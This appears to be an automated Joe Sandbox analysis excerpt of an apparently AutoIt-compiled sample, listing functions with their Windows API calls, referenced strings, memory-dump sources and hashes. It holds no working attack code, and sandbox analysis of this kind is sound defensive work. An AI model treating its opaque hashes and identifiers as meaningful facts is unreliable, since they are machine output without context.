Instruction ID: 853ec4450d190003e61d17e5fa00a8bba85d480b9e5a1a2de57cc0ff5553e515
Opcode Fuzzy Hash: 14721660dcfe1b55f181ad28c0c0b9594c23d292169b8d446a01a66bf421feee
Instruction Fuzzy Hash: D8518E711047169FC704EF20C98686ABBF9FF94358F10492DF896972A1DB31EE05CB92

Function 005EA832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005EA852
__swprintf.LIBCMT ref: 005EA874
CreateDirectoryW.KERNEL32(?,00000000), ref: 005EA8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 005EA8D6
_memset.LIBCMT ref: 005EA8F5
_wcsncpy.LIBCMT ref: 005EA931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 005EA966
CloseHandle.KERNEL32(00000000), ref: 005EA971
RemoveDirectoryW.KERNEL32(?), ref: 005EA97A
CloseHandle.KERNEL32(00000000), ref: 005EA984

Strings

\??\%s, xrefs: 005EA86E
\, xrefs: 005EA88A
:, xrefs: 005EA895

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: c15a4b81bba006d240c94345d6fdc73fdd3492a863563c5ff5cdf7d19a347352
Instruction ID: 1269a21eaecb440dae2b19e091616aaa1205b7a2982c9813b80169206c835de9
Opcode Fuzzy Hash: c15a4b81bba006d240c94345d6fdc73fdd3492a863563c5ff5cdf7d19a347352
Instruction Fuzzy Hash: EA31B27290014AABDB219FA1DC49FEF77BDFF89700F1441A6F548D2060E774A7848B25

Function 0060C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0060982C,?,?), ref: 0060C0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0060982C,?,?,00000000,?), ref: 0060C0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0060982C,?,?,00000000,?), ref: 0060C0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,0060982C,?,?,00000000,?), ref: 0060C0F7
GlobalLock.KERNEL32(00000000), ref: 0060C100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0060982C,?,?,00000000,?), ref: 0060C10F
GlobalUnlock.KERNEL32(00000000), ref: 0060C118
CloseHandle.KERNEL32(00000000,?,?,?,?,0060982C,?,?,00000000,?), ref: 0060C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0060982C,?,?,00000000,?), ref: 0060C130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00613C7C,?), ref: 0060C149
GlobalFree.KERNEL32(00000000), ref: 0060C159
GetObjectW.GDI32(00000000,00000018,?), ref: 0060C17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0060C1A8
DeleteObject.GDI32(00000000), ref: 0060C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0060C1E6

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: e89980b9257723d5d3e0a520f4f32a4557b300031097a6d8ca338826eb9e9a80
Instruction ID: 734cf40ef9c8d46cabd70169ecebd77dfc1ba05aaa299380e286f7832e230ab3
Opcode Fuzzy Hash: e89980b9257723d5d3e0a520f4f32a4557b300031097a6d8ca338826eb9e9a80
Instruction Fuzzy Hash: 2B417B74540208FFDB118F65DC88EEB7BBAEF89721F148159F906E72A0CB719981CB60

Function 0060C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005829E2: GetWindowLongW.USER32(?,000000EB), ref: 005829F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0060C8A4
GetFocus.USER32 ref: 0060C8B4
GetDlgCtrlID.USER32(00000000), ref: 0060C8BF
_memset.LIBCMT ref: 0060C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0060CA15
GetMenuItemCount.USER32(?), ref: 0060CA35
GetMenuItemID.USER32(?,00000000), ref: 0060CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0060CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0060CAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0060CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0060CB31

Strings

0, xrefs: 0060C9E2

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 520634b24300f7f125ec9a3d3c72513f4bbdebca85c9f569bb058f67972f7316
Instruction ID: 0d922d1eaacd83cb5cae5d73ac4dc5a409ee903e94327f4b0ac7c119c27dddf8
Opcode Fuzzy Hash: 520634b24300f7f125ec9a3d3c72513f4bbdebca85c9f569bb058f67972f7316
Instruction Fuzzy Hash: B78190706483059FDB14CF14C985AABBBEAFF88364F044A2EF995932D1C770D945CBA2

Function 005D8ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005D8E3C
Part of subcall function 005D8E20: GetLastError.KERNEL32(?,005D8900,?,?,?), ref: 005D8E46
Part of subcall function 005D8E20: GetProcessHeap.KERNEL32(00000008,?,?,005D8900,?,?,?), ref: 005D8E55
Part of subcall function 005D8E20: HeapAlloc.KERNEL32(00000000,?,005D8900,?,?,?), ref: 005D8E5C
Part of subcall function 005D8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005D8E73

Part of subcall function 005D8EBD: GetProcessHeap.KERNEL32(00000008,005D8916,00000000,00000000,?,005D8916,?), ref: 005D8EC9
Part of subcall function 005D8EBD: HeapAlloc.KERNEL32(00000000,?,005D8916,?), ref: 005D8ED0
Part of subcall function 005D8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005D8916,?), ref: 005D8EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005D8B2E
_memset.LIBCMT ref: 005D8B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005D8B62
GetLengthSid.ADVAPI32(?), ref: 005D8B73
GetAce.ADVAPI32(?,00000000,?), ref: 005D8BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005D8BCC
GetLengthSid.ADVAPI32(?), ref: 005D8BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005D8BF8
HeapAlloc.KERNEL32(00000000), ref: 005D8BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 005D8C20
CopySid.ADVAPI32(00000000), ref: 005D8C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005D8C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005D8C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 005D8C92

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 4c1a791747a0e41f651d85e7d9f1b1627e78b644fd591176dc490da7c4f7e820
Instruction ID: be6a8bbe40022347977098127ab1cca5e37754ed73a21874972fc29c7f06576b
Opcode Fuzzy Hash: 4c1a791747a0e41f651d85e7d9f1b1627e78b644fd591176dc490da7c4f7e820
Instruction Fuzzy Hash: 0061497590020AEFDF209F98DC45AFEBB7AFF44301F04815BE915AA2A0DB759A45CB60

Function 005F7A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 005F7A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 005F7A85
CreateCompatibleDC.GDI32(?), ref: 005F7A91
SelectObject.GDI32(00000000,?), ref: 005F7A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 005F7AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 005F7B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 005F7B52
SelectObject.GDI32(00000006,?), ref: 005F7B5A
DeleteObject.GDI32(?), ref: 005F7B63
DeleteDC.GDI32(00000006), ref: 005F7B6A
ReleaseDC.USER32(00000000,?), ref: 005F7B75

Strings

(, xrefs: 005F7AFA

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 5f97657519245880e1789fbd158477173626ce71bdca2e409973901951e14e30
Instruction ID: 88dca0d3a04fbff68435bc8b7a5d9b74be044215d83a6c87076e094a4e7fa6ab
Opcode Fuzzy Hash: 5f97657519245880e1789fbd158477173626ce71bdca2e409973901951e14e30
Instruction Fuzzy Hash: 4C515C71904209EFDB15CFA9CC85EAEBBB9FF48310F14841EFA89A7210D775A9418B60

Function 005E9710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005E951A: __time64.LIBCMT ref: 005E9524

Part of subcall function 00594A8C: _fseek.LIBCMT ref: 00594AA4

__wsplitpath.LIBCMT ref: 005E97EF

Part of subcall function 005A431E: __wsplitpath_helper.LIBCMT ref: 005A435E

_wcscpy.LIBCMT ref: 005E9802
_wcscat.LIBCMT ref: 005E9815
__wsplitpath.LIBCMT ref: 005E983A
_wcscat.LIBCMT ref: 005E9850
_wcscat.LIBCMT ref: 005E9863

Part of subcall function 005E9560: _memmove.LIBCMT ref: 005E9599
Part of subcall function 005E9560: _memmove.LIBCMT ref: 005E95A8

_wcscmp.LIBCMT ref: 005E97AA

Part of subcall function 005E9CF1: _wcscmp.LIBCMT ref: 005E9DE1
Part of subcall function 005E9CF1: _wcscmp.LIBCMT ref: 005E9DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 005E9A0D
_wcsncpy.LIBCMT ref: 005E9A80
DeleteFileW.KERNEL32(?,?), ref: 005E9AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 005E9ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 005E9ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 005E9AEF

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: cea5f4a8cdc592827f4abb3177682a3e911756123ee26444ad796bdb5c2f7247
Instruction ID: 2bf2be44f8de9c0f09638937dba1a8f60c0ec7fe63b708e379408049ea20d9a2
Opcode Fuzzy Hash: cea5f4a8cdc592827f4abb3177682a3e911756123ee26444ad796bdb5c2f7247
Instruction Fuzzy Hash: A8C14DB1D00219AADF15DF95CC89EDEBBBDFF85300F0040AAF649E6151EB709A848F65

Function 005929BE Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 005A0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00592A3E,?,00008000), ref: 005A0BA7

Part of subcall function 005A0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00592A58,?,00008000), ref: 005A02A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00592ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00592C2C

Part of subcall function 00593EBE: _wcscpy.LIBCMT ref: 00593EF6

Part of subcall function 005A386D: _iswctype.LIBCMT ref: 005A3875

Strings

AU3!, xrefs: 00592A93
Error opening the file, xrefs: 005CFD33, 005CFDAA
Bad directive syntax error, xrefs: 005D008F
#include depth exceeded. Make sure there are no recursive includes, xrefs: 005CFD17
_5Y, xrefs: 005CFDDF, 005CFE03
EA06, xrefs: 005CFD48
Unterminated string, xrefs: 005D00D6

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_5Y
API String ID: 537147316-2617529222
Opcode ID: 26288daaf35717d515acb6daf3671cc91bef872e6b746ccc27cef49eb7795fd3
Instruction ID: a4a5508fb830b20ac43635738a197f42b37e192ca9a548d968c3456ed965bf36
Opcode Fuzzy Hash: 26288daaf35717d515acb6daf3671cc91bef872e6b746ccc27cef49eb7795fd3
Instruction Fuzzy Hash: 93026D30108342AFCB24EF24C855AAFBFE5BFD5354F14491EF496972A2DB309949CB52

Function 00595BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00595BF1
GetMenuItemCount.USER32(00647890), ref: 005D0E7B
GetMenuItemCount.USER32(00647890), ref: 005D0F2B
GetCursorPos.USER32(?), ref: 005D0F6F
SetForegroundWindow.USER32(00000000), ref: 005D0F78
TrackPopupMenuEx.USER32(00647890,00000000,?,00000000,00000000,00000000), ref: 005D0F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005D0F97

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 37a948857158e57b9d85913714bc77851a7e29dc66d5d63910110bc16c8aa5fd
Instruction ID: 1b5db3dd0c69ba2288de51e19e0d81703c21805ca3736c7cd5d1741325e344cd
Opcode Fuzzy Hash: 37a948857158e57b9d85913714bc77851a7e29dc66d5d63910110bc16c8aa5fd
Instruction Fuzzy Hash: B771F23064460ABEFF319B59CC49FAABF6AFB44364F245207F514A62D1D7B0AC60DB90

Function 005EAEEA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00610980), ref: 005EAF4E
GetDriveTypeW.KERNEL32(00000061,0063B5F0,00000061), ref: 005EB018
_wcscpy.LIBCMT ref: 005EB042

Strings

fixed, xrefs: 005EAF96
removable, xrefs: 005EAF80
ramdisk, xrefs: 005EAFC2
cdrom, xrefs: 005EAF6A
network, xrefs: 005EAFAC
unknown, xrefs: 005EAFD9
all, xrefs: 005EAF54
L,a, xrefs: 005EB03A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: L,a$all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-993591591
Opcode ID: 7bca76eccb0e86b82f70da0ad4b2330fdbce5370ccd6fa7d653b3dadbec1e3de
Instruction ID: f09da8dc7606ca833c208e770f9cce59752cd2a3a074bc3c7be8696090296339
Opcode Fuzzy Hash: 7bca76eccb0e86b82f70da0ad4b2330fdbce5370ccd6fa7d653b3dadbec1e3de
Instruction Fuzzy Hash: 5E51AC711183469BC718EF25C895AAFBFA5FFD0310F504819F9A5572A2EB30ED09CB82

Function 005D83FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

_memset.LIBCMT ref: 005D8489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005D84BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005D84DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005D84F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005D8520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 005D8548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005D8553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005D8558

Strings

SOFTWARE\Classes\, xrefs: 005D842A
\IPC$, xrefs: 005D84A0
\CLSID, xrefs: 005D8440

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 9345f149a78f74a1b3301f70bfaea7ace5827ae43c8cd746b488ac0b0affce63
Instruction ID: 5834d42b781926156fdff6a8eda6603086e6866438b249b7d6f5f86a19980785
Opcode Fuzzy Hash: 9345f149a78f74a1b3301f70bfaea7ace5827ae43c8cd746b488ac0b0affce63
Instruction Fuzzy Hash: 4241F872C1062EABDF21EBA4DC999EDBB79FF48340F04456AF815A2261DB709D44CB90

Function 0060147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0060040D,?,?), ref: 00601491

Strings

HKU, xrefs: 006015A3
HKEY_CURRENT_CONFIG, xrefs: 0060154E
HKEY_CLASSES_ROOT, xrefs: 00601524
HKEY_USERS, xrefs: 00601592
HKCU, xrefs: 00601581
HKEY_CURRENT_USER, xrefs: 00601570
HKEY_LOCAL_MACHINE, xrefs: 006014FA
HKCR, xrefs: 00601539
HKLM, xrefs: 0060150F
HKCC, xrefs: 0060155F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 62274c71dd3026a2e3b11fc4bc77d6bde916c8fcd4d1054f27323dd7daf91815
Instruction ID: c5157893a2b2427a1d16d59d3a695abb9b90dc87767818bf6991f1fa9d28f088
Opcode Fuzzy Hash: 62274c71dd3026a2e3b11fc4bc77d6bde916c8fcd4d1054f27323dd7daf91815
Instruction Fuzzy Hash: D941497159025A8BCF09EF90D885AEF3BA6BF92310F504415FC525F2A2DB31ED19CB90

Function 005E5882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

Part of subcall function 0059153B: _memmove.LIBCMT ref: 005915C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005E58EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 005E5901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005E5912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 005E5924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 005E5935

Strings

open , xrefs: 005E589A
status PlayMe mode, xrefs: 005E58E6
play PlayMe wait, xrefs: 005E591F
alias PlayMe, xrefs: 005E58C4
play PlayMe, xrefs: 005E5930
close PlayMe, xrefs: 005E58FC, 005E5929

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: ce84b30818b1d03fb417bbed778d3b7b189c8b649cf938e33da172cdfe55525b
Instruction ID: 2eb4469187e666551e65a9ef1d2367b17f0fe59ed6012be74e71e76b9464e484
Opcode Fuzzy Hash: ce84b30818b1d03fb417bbed778d3b7b189c8b649cf938e33da172cdfe55525b
Instruction Fuzzy Hash: D911603199057AB9EB24A7A2DC5ADFF6F7CFBD1B50F410829B541E20D1EA601905C9E0

Function 005E4C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 005E4C27
gethostname.WSOCK32(?,00000100), ref: 005E4C41
gethostbyname.WSOCK32(?), ref: 005E4C4E
_wcscpy.LIBCMT ref: 005E4C76
_memmove.LIBCMT ref: 005E4C89
inet_ntoa.WSOCK32(?), ref: 005E4C94
_strcat.LIBCMT ref: 005E4CA2
_wcscpy.LIBCMT ref: 005E4CB9
WSACleanup.WSOCK32 ref: 005E4CC7
_wcscpy.LIBCMT ref: 005E4CD5

Strings

0.0.0.0, xrefs: 005E4C70

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
